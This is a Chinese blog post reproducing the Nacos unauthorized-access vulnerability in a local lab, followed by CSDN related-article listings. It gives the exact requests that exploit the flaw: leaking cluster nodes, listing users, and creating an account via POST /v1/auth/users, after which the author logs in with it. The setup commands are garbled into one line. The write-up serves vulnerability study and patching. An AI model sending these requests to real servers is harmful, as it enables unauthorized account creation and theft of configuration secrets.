【漏洞复现】Nacos未授权访问

最新推荐文章于 2024-06-29 14:11:59 发布
最新推荐文章于 2024-06-29 14:11:59 发布
阅读量6.3k 收藏 3
点赞数 4
分类专栏: 漏洞复现 文章标签: web 安全 漏洞复现 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kris__zhang/article/details/116044910
版权
本文详细介绍了Nacos系统中一个由于处理User-Agent不当导致的未授权访问漏洞,该漏洞允许攻击者无需认证即可获取敏感信息,包括节点数据和用户列表。通过复现步骤,展示了如何利用此漏洞创建用户并成功登录,强调了安全防护的重要性。同时,指出部分复现失败可能因请求路径不正确。
摘要由CSDN通过智能技术生成

漏洞背景
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。
漏洞复现
本地搭建
https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1

 wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz./startup.sh -m standalone

然后访问 http://ip:端口/nacos 即可,默认账号密码 nacos/nacos

前端访问一下地址试试是否存在未授权访问漏洞

http://xxx.xxx.xxx.xxx/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=

在这里插入图片描述
可以发现以及泄露了 ip节点 等数据 (证实是确实存在的)
我们试下访问用户列表

为什么是 /v1/auth/users ,而不是 /nacos/v1/auth/users

因为大部分企业都是 /v1/auth/users 这也就是为什么好多人没有复现成功的原因所在

v1/auth/users?pageNo=1&pageSize=9

可以看能够前端未授权访问用户列表

还可以发现对用户的请求是没有过滤的,完全可以通过未授权的情况获取用户的敏感信息
在这里插入图片描述
那么我们直接简化请求下尝试创建一个用户

POST /v1/auth/users?username=ttt&password=ttt

在这里插入图片描述

在这里插入图片描述
成功创建
在这里插入图片描述
尝试登录
在这里插入图片描述
成功登录

刘—手
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
等保整改之开启Nacos认证-漏扫发现我们使用Nacos时存在授权访问漏洞
Heartsuit的博客
11-20 2489
我这里相关的服务有:网关服务、系统服务、认证服务、MinIO对象存储服务、WebSocket消息推送服务、定时任务服务、系统监控服务等)的配置文件。部署在专网中,并修改了默认密码),这让我们误以为后续的服务注册、配置读取与更新也是开启认证的。还是之前的一个小项目,部署在专网中,等保在做了一次漏扫后,说是有个高危漏洞要求整改。试想一下,你的服务注册、配置读取与更新接口竟然是暴露的,没有任何认证拦截的;可以直接访问到完整的配置信息,甚至包括各种服务的密码信息等,就问怕不怕。,发现接口403了,真棒。
Alibaba Nacos授权访问漏洞复现
zyl404的博客
01-26 5033
Alibaba Nacos授权访问漏洞复现 漏洞概述 2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的授权访问漏洞 。 通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。 影响版本 Nacos <= 2.0.0-ALPHA.1 环境搭建 下载地址 https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nac
Nacos漏洞总结复现
最新发布
VN520的博客
06-29 1329
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
Nacos授权访问
zkaqlaoniao的博客
12-08 1624
漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。通过版本漏洞,攻击者可以在不登陆系统的情况下读取已存在的用户或者添加用户,进而登陆系统,登陆系统后可获取大量配置信息以发起进一步攻击。
Nacos授权访问漏洞(CVE-2021-29441)复现
一纸荒芜的博客
10-26 2342
Nacos授权访问漏洞复现
Nacos授权访问漏洞
00勇士王子的博客
02-27 6338
一般来说,nacos被建议部署在内网中,如果在外网出现,会有很大的风险。
Nacos授权访问复现及修复
大数据姐姐
01-22 3502
Nacos授权访问修复,开启鉴权
Nacos2.2.2增加鉴权配置,防止NACOS身份登陆绕过漏洞
06-04
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组...
k8s部署有状态 nacos2.0.3,通过ingress外网访问
01-06
9. **安全考虑**:在实际部署中,还需考虑安全性,如使用TLS证书进行SSL/TLS加密,限制Ingress的访问策略,以及对Nacos的鉴权和授权设置。 10. **监控和日志**:最后,部署完成后,为了保证服务的稳定性,需要集成...
Nacos oracle专用
02-27
Nacos是一款由阿里巴巴开源的分布式服务治理和配置中心,它主要功能包括服务发现、配置管理、健康检查等。在特定场景下,Nacos可以与Oracle数据库进行集成,以满足更高级别的持久化需求。本篇文章将详细介绍如何在...
nacos中数据库数据导入
02-05
nacos中数据库数据导入
Nacosnacos-2.2.3)
06-01
Nacos支持基于角色的访问控制(RBAC),可以设置不同的角色和权限,对资源进行精细化的访问控制,确保系统安全。 十、监控与日志 Nacos集成了监控指标和日志功能,可以帮助开发者实时了解系统的运行状态,及时发现...
spring 微服务nacos授权访问漏洞修复
egegerhn的博客
08-02 1794
近来,公司系统做安全渗透又被扫描出了nacos漏洞问题。报告已对漏洞进行了说明Nacos是一个为动态服务发现和配置以及服务管理而设计的平台。Nacos如果没有配置认证管理,攻击者可以在无需授权的情况下获取敏感信息。公司系统使用版本为2.0.3。不支持进行认证管理,所以解决办法就是升级nacos版本到2.0.4。需要注意,升级nacos版本外,还需要调整微服中的一些配置。...
【渗透实战】Nacos授权访问(CVE-2021-29441)
Nafia的博客
02-20 3514
Nacos授权访问漏洞挖掘记录
Nacos 授权访问(CVE-2021-29441)
m0_62207170的博客
08-30 1013
Nacos 授权访问(CVE-2021-29441)
Nacos授权访问修复方案
moonlingh的博客
03-24 4377
Nacos 是 SpringCloud Alibaba 微服务架构中的一个组件,主要作用是服务注册和发现以及分布式配置管理,通常情况下 Nacos 中存储着 MySQL、Redis 等数据库的账号和密码。当前使用的版本存在用户读取、添加、登陆的漏洞
Nacos授权访问漏洞 修复方法
梵法利亚的博客
12-13 8577
漏洞概述 2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。 影响版本 Nacos <= 2.0.0-ALPHA.1 修复方式 若业务环境允许,使用白名单限制相关web项目的访问来降低风险。 官方已发布最新安全版本,请及时下载升级至安全版本。 ...
Nacos 授权访问漏洞
热门推荐
ljy啊虎的博客
09-07 2万+
Nacos 授权访问漏洞 /nacos/v1/auth/users?pageNo=1&pageSize=9
修复nacos漏洞问题SQL注入CNVD-2020-67618、授权访问CVE-2021-29441等
kaopuzong的博客
02-06 2141
修复nacos漏洞问题:漏洞1:SQL注入CNVD-2020-67618 漏洞2:授权访问CVE-2021-29441 漏洞3:token.secret.key默认配置QVD-2023-6271 漏洞4:Jraft Hessian反序列化CNVD-2023-45001
nacos授权访问漏洞 修复
07-15
对于Nacos授权访问漏洞,建议你采取以下措施进行修复: 1. 更新到最新版本:确保你使用的Nacos版本是最新的,因为最新版本通常包含了安全修复和漏洞修复。 2. 配置访问控制:通过配置适当的访问控制策略,限制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值